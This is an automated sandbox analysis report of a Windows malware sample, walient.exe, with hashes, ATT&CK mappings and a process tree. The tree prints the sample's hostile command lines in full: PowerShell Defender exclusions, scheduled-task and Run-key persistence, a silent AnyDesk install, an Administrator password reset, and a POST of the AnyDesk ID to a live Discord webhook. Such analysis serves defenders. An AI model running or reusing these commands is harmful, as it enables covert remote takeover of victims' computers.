Analysis
-
max time kernel
123s -
max time network
122s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
04-07-2024 20:40
Static task
static1
Behavioral task
behavioral1
Sample
walient.exe
Resource
win11-20240611-en
General
-
Target
walient.exe
-
Size
121KB
-
MD5
5c76d15a7d3f57f26edc494bd9db318b
-
SHA1
cfa089d8d7e9fde67b6cb85827d33431b2d80066
-
SHA256
af872e954905dbfeb165da42d722889a7dfc4b84e88b52c9abc9de18a1a9d74f
-
SHA512
3d7a621dcb56a8d8ded08e49c34c77071bcb8e8f408acd2ec9c00ff887342d1e3be935f3ad56b33ef7a96d0d85e1e36b6cccc9498a2b0fe96dab7b5d5747c1fb
-
SSDEEP
3072:0ojAQkj90n5EIrHshi+LFUWHnGWdw8OkG2Li0HbovOm:YjWnSeGisFXnJw8Ziib
Malware Config
Extracted
https://download.anydesk.com/AnyDesk.exe
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 4 3100 powershell.exe 41 4564 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1008 powershell.exe 976 powershell.exe 4744 powershell.exe 1436 powershell.exe 4564 powershell.exe 3100 powershell.exe 3624 powershell.exe -
Drops startup file 2 IoCs
Processes:
walient.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.lnk walient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.lnk walient.exe -
Executes dropped EXE 10 IoCs
Processes:
System32.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeSystem32.exepid process 1640 System32.exe 3948 AnyDesk.exe 3376 AnyDesk.exe 1912 AnyDesk.exe 3384 AnyDesk.exe 4920 AnyDesk.exe 1332 AnyDesk.exe 832 AnyDesk.exe 1092 AnyDesk.exe 2656 System32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
walient.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\System32.exe" walient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AnyDesk = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --silent" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 15 IoCs
Processes:
AnyDesk.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db AnyDesk.exe -
Drops file in Program Files directory 2 IoCs
Processes:
AnyDesk.exedescription ioc process File created C:\Program Files (x86)\AnyDesk\AnyDesk.exe AnyDesk.exe File opened for modification C:\Program Files (x86)\AnyDesk\AnyDesk.exe AnyDesk.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 2840 timeout.exe 3372 timeout.exe 1772 timeout.exe 2372 timeout.exe -
Modifies registry class 16 IoCs
Processes:
AnyDesk.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk AnyDesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --play \"%1\"" AnyDesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol AnyDesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell AnyDesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" \"%1\"" AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon AnyDesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\",0" AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open AnyDesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command AnyDesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" AnyDesk.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3288 schtasks.exe 4116 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
AnyDesk.exepid process 4920 AnyDesk.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exewalient.exepowershell.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exepowershell.exepowershell.exepid process 1008 powershell.exe 1008 powershell.exe 976 powershell.exe 976 powershell.exe 4744 powershell.exe 4744 powershell.exe 1436 powershell.exe 1436 powershell.exe 960 walient.exe 3100 powershell.exe 3100 powershell.exe 3376 AnyDesk.exe 3376 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3948 AnyDesk.exe 3384 AnyDesk.exe 3384 AnyDesk.exe 1332 AnyDesk.exe 1332 AnyDesk.exe 3624 powershell.exe 3624 powershell.exe 4564 powershell.exe 4564 powershell.exe 3384 AnyDesk.exe 3384 AnyDesk.exe 3384 AnyDesk.exe 3384 AnyDesk.exe 3384 AnyDesk.exe 3384 AnyDesk.exe 3384 AnyDesk.exe 3384 AnyDesk.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
walient.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystem32.exepowershell.exepowershell.exeAnyDesk.exeAUDIODG.EXESystem32.exedescription pid process Token: SeDebugPrivilege 960 walient.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeDebugPrivilege 976 powershell.exe Token: SeDebugPrivilege 4744 powershell.exe Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 960 walient.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 1640 System32.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 4564 powershell.exe Token: SeDebugPrivilege 3384 AnyDesk.exe Token: SeDebugPrivilege 3384 AnyDesk.exe Token: SeDebugPrivilege 3384 AnyDesk.exe Token: SeAssignPrimaryTokenPrivilege 3384 AnyDesk.exe Token: 33 3428 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3428 AUDIODG.EXE Token: SeDebugPrivilege 2656 System32.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
Processes:
AnyDesk.exeAnyDesk.exepid process 1912 AnyDesk.exe 1912 AnyDesk.exe 1912 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe -
Suspicious use of SendNotifyMessage 11 IoCs
Processes:
AnyDesk.exeAnyDesk.exepid process 1912 AnyDesk.exe 1912 AnyDesk.exe 1912 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe 4920 AnyDesk.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
walient.exeAnyDesk.exepid process 960 walient.exe 1092 AnyDesk.exe 1092 AnyDesk.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
walient.execmd.exeAnyDesk.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 960 wrote to memory of 1008 960 walient.exe powershell.exe PID 960 wrote to memory of 1008 960 walient.exe powershell.exe PID 960 wrote to memory of 976 960 walient.exe powershell.exe PID 960 wrote to memory of 976 960 walient.exe powershell.exe PID 960 wrote to memory of 4744 960 walient.exe powershell.exe PID 960 wrote to memory of 4744 960 walient.exe powershell.exe PID 960 wrote to memory of 1436 960 walient.exe powershell.exe PID 960 wrote to memory of 1436 960 walient.exe powershell.exe PID 960 wrote to memory of 3288 960 walient.exe schtasks.exe PID 960 wrote to memory of 3288 960 walient.exe schtasks.exe PID 960 wrote to memory of 1376 960 walient.exe cmd.exe PID 960 wrote to memory of 1376 960 walient.exe cmd.exe PID 1376 wrote to memory of 3100 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 3100 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 2372 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 2372 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 3948 1376 cmd.exe AnyDesk.exe PID 1376 wrote to memory of 3948 1376 cmd.exe AnyDesk.exe PID 1376 wrote to memory of 3948 1376 cmd.exe AnyDesk.exe PID 3948 wrote to memory of 3376 3948 AnyDesk.exe AnyDesk.exe PID 3948 wrote to memory of 3376 3948 AnyDesk.exe AnyDesk.exe PID 3948 wrote to memory of 3376 3948 AnyDesk.exe AnyDesk.exe PID 3948 wrote to memory of 1912 3948 AnyDesk.exe AnyDesk.exe PID 3948 wrote to memory of 1912 3948 AnyDesk.exe AnyDesk.exe PID 3948 wrote to memory of 1912 3948 AnyDesk.exe AnyDesk.exe PID 1376 wrote to memory of 2840 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 2840 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 5040 1376 cmd.exe cmd.exe PID 1376 wrote to memory of 5040 1376 cmd.exe cmd.exe PID 1376 wrote to memory of 1332 1376 cmd.exe AnyDesk.exe PID 1376 wrote to memory of 1332 1376 cmd.exe AnyDesk.exe PID 1376 wrote to memory of 1332 1376 cmd.exe AnyDesk.exe PID 1376 wrote to memory of 3372 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 3372 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 768 1376 cmd.exe reg.exe PID 1376 wrote to memory of 768 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1772 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 1772 1376 cmd.exe timeout.exe PID 1376 wrote to memory of 3624 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 3624 1376 cmd.exe powershell.exe PID 1376 wrote to memory of 1372 1376 cmd.exe net.exe PID 1376 wrote to memory of 1372 1376 cmd.exe net.exe PID 1372 wrote to memory of 3492 1372 net.exe net1.exe PID 1372 wrote to memory of 3492 1372 net.exe net1.exe PID 1376 wrote to memory of 3240 1376 cmd.exe net.exe PID 1376 wrote to memory of 3240 1376 cmd.exe net.exe PID 3240 wrote to memory of 3368 3240 net.exe net1.exe PID 3240 wrote to memory of 3368 3240 net.exe net1.exe PID 1376 wrote to memory of 3936 1376 cmd.exe net.exe PID 1376 wrote to memory of 3936 1376 cmd.exe net.exe PID 3936 wrote to memory of 4616 3936 net.exe net1.exe PID 3936 wrote to memory of 4616 3936 net.exe net1.exe PID 1376 wrote to memory of 3728 1376 cmd.exe net.exe PID 1376 wrote to memory of 3728 1376 cmd.exe net.exe PID 3728 wrote to memory of 3404 3728 net.exe net1.exe PID 3728 wrote to memory of 3404 3728 net.exe net1.exe PID 1376 wrote to memory of 2424 1376 cmd.exe net.exe PID 1376 wrote to memory of 2424 1376 cmd.exe net.exe PID 2424 wrote to memory of 2704 2424 net.exe net1.exe PID 2424 wrote to memory of 2704 2424 net.exe net1.exe PID 1376 wrote to memory of 4116 1376 cmd.exe schtasks.exe PID 1376 wrote to memory of 4116 1376 cmd.exe schtasks.exe PID 1376 wrote to memory of 4900 1376 cmd.exe cmd.exe PID 1376 wrote to memory of 4900 1376 cmd.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\walient.exe"C:\Users\Admin\AppData\Local\Temp\walient.exe"1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\walient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'walient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System32.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System32.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System32" /tr "C:\Users\Admin\System32.exe"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\System32.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://download.anydesk.com/AnyDesk.exe', 'C:\AnyDesk.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak3⤵
- Delays execution with timeout.exe
-
C:\AnyDesk.exe"C:\AnyDesk.exe" --install "C:\Program Files (x86)\AnyDesk" --silent --update-auto3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\AnyDesk.exe"C:\AnyDesk.exe" --local-service4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\AnyDesk.exe"C:\AnyDesk.exe" --local-control4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\timeout.exetimeout /t 7 /nobreak3⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Itsm3g#no "3⤵
-
C:\Program Files (x86)\AnyDesk\AnyDesk.exe"C:\Program Files (x86)\AnyDesk/AnyDesk.exe" --set-password3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AnyDesk" /t REG_SZ /d "\"C:\Program Files (x86)\AnyDesk\AnyDesk.exe\" --silent" /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\timeout.exetimeout /t 2 /nobreak3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers' -Name 'C:\Program Files (x86)\AnyDesk\AnyDesk.exe' -Value 'RUNASADMIN'"3⤵
- Command and Scripting Interpreter: PowerShell
- Access Token Manipulation: Create Process with Token
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup Administrators Admin /delete3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators Admin /delete4⤵
-
C:\Windows\system32\net.exenet localgroup Administrators /delete3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators /delete4⤵
-
C:\Windows\system32\net.exenet localgroup Administrators Administrator /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators Administrator /add4⤵
-
C:\Windows\system32\net.exenet user Administrator Itsm3g#no3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Administrator Itsm3g#no4⤵
-
C:\Windows\system32\net.exenet user Administrator /active:yes3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Administrator /active:yes4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Booter" /tr "\"C:\Program Files (x86)\AnyDesk\AnyDesk.exe\"" /sc onstart /ru system /rl highest3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c ""C:\Program Files (x86)\AnyDesk\AnyDesk.exe"" --get-id3⤵
-
C:\Windows\system32\cmd.execmd /c ""C:\Program Files (x86)\AnyDesk\AnyDesk.exe"" --get-id4⤵
-
C:\Program Files (x86)\AnyDesk\AnyDesk.exe"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --get-id5⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "$body = @{ content = 'AnyDesk ID is: \"1363826712\"' }; Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1258511169841532991/GrwPZfm9ekTr7GHjmdDSwad-g2UoAbt-DvGuyTG8kPXJ9PK0sGzxcyCmHj39cK_JV3sc' -Method Post -ContentType 'application/json' -Body ($body | ConvertTo-Json)"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\System32.exeC:\Users\Admin\System32.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\AnyDesk\AnyDesk.exe"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\AnyDesk\AnyDesk.exe"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --backend2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\AnyDesk\AnyDesk.exe"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control1⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004DC1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\System32.exeC:\Users\Admin\System32.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\AnyDesk.exeFilesize
5.1MB
MD5aee6801792d67607f228be8cec8291f9
SHA1bf6ba727ff14ca2fddf619f292d56db9d9088066
SHA2561cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499
SHA51209d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f
-
C:\ProgramData\AnyDesk\service.confFilesize
2KB
MD5e0f56b88aacb294d6be47f7bcb51c555
SHA198ebaf991f66ae9f94a50caafd339828492042ab
SHA256064e3179c548a409a9fb0ba220585d4bcd516a47d908f3d1e8f40b8377d05e02
SHA51213e026642c61f7599854f2fd453eae01a37158d45dc0676ed5df7f2e15629c879efcd64aab6a52d58a44b226b8cb64bf1804b823a0d9d93d63266d190509c1d4
-
C:\ProgramData\AnyDesk\service.confFilesize
3KB
MD50cfcdc7661a3f3de7bb713e731b6bff0
SHA13a763fa6ed368c24729db9478880196f6e106786
SHA25619632eae1746330970b64ff8cc879bff75ff82934c29911ea56ea923ea9d1e60
SHA512b94f5dc43a6a9320ffafd0dc8918086d1eb738f2f73e66cff80d26950cc8c81250b00582ea3846d89f38bf82b98dc3cc005d99dee4afd55bd7b6611fbdcacc80
-
C:\ProgramData\AnyDesk\system.confFilesize
370B
MD5afdc4f69f4720b8c4153f6186f49a2b6
SHA1329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA2569a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
SHA5123a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de
-
C:\ProgramData\AnyDesk\system.confFilesize
482B
MD5f4e4265aba4f725aa5f6b108a6f8c1e5
SHA1e24a6ebde2a690e97491c02f513c3245592f2eac
SHA256eefc386a9572e1ddea0d7476e8b3b2d70fc08f0c71467eb24ddb71cadf0906ef
SHA512854cb14a678112c7dce785b0353dff8f11680194138e1e2a319cc8da880c9484b0d64fcbe5c41016d33f5e9eccff89f9563ec21fa7b274406b2359341d266970
-
C:\ProgramData\AnyDesk\system.confFilesize
690B
MD5620262eb2949dc87256a53b76f9db2f2
SHA12035cedea5d86a7b5c020abc8763aed9fd1b0d49
SHA256d052164be8748395b746583220e6e65a13548243a5436feb0d74f843f32083d1
SHA512f19e9f808834a6a7111fb7b2c0785b3050d931dc706fa1f314bcb213d7cab938514fee4032dad3a8f28bda65209daf4505025e77ba0d91feb3d82bcd87276cbc
-
C:\ProgramData\AnyDesk\system.confFilesize
747B
MD5e7738117c5524f22fa99cd7f2a5ad382
SHA114f50aec8cbcaa70e70479f1cf3897d90e24b0d1
SHA2566d8e70d9aa419d6e014340d47e0d9abf45d02febe3d957af939875a5ba92b5f6
SHA5124a3326296462271744128cc3b7bca1b9734da8566dabed2d01757da71a97af4efd9677bed88f74917d64501177c5811af335ce0ad3363360eccb04e25c31d766
-
C:\ProgramData\AnyDesk\system.confFilesize
956B
MD56319ce0b5326caf23489e5adddcee4a0
SHA1d7769680610321abaf0c763351c6c9d34127a664
SHA2564096756b9b370649a03c4b9fa1efbc6f8728ba38ca314b12badf34fa1a01f181
SHA512870be307398d3cbc8209fdbfa32be138d83bb2b54e056948c0085b6fc3a7d016a81b501e92be9ce8a9ec262aa0a428995a130751d28061d92a632955a9c86901
-
C:\ProgramData\System32.batFilesize
1KB
MD573e1f5a29694c5899071a654e501e174
SHA1bef7e160242c776d04bc4e6766fd22a848e10142
SHA25653ed7e7fa874e9965210b8c600ab9c0f331c7f1d514bb2cfe13375edcf0a8f74
SHA512e16dc641315d7f04b05844432438b19f5f00aaefde5da54f24f37e9b158df90fa54e0a5b9ea749c5e239528f6d55e3bd22374ffd91acb2a2e03b0fd784fa71ff
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System32.exe.logFilesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51bb532b5a4c3719a8f8905bcdd4b46dd
SHA15b8172fb3038f4e0dbd81995d48bc446ec70e26d
SHA2567b77cd3f6634833b49bb35b7564e8193e1d5b00e0467a431797d4ee15d38e795
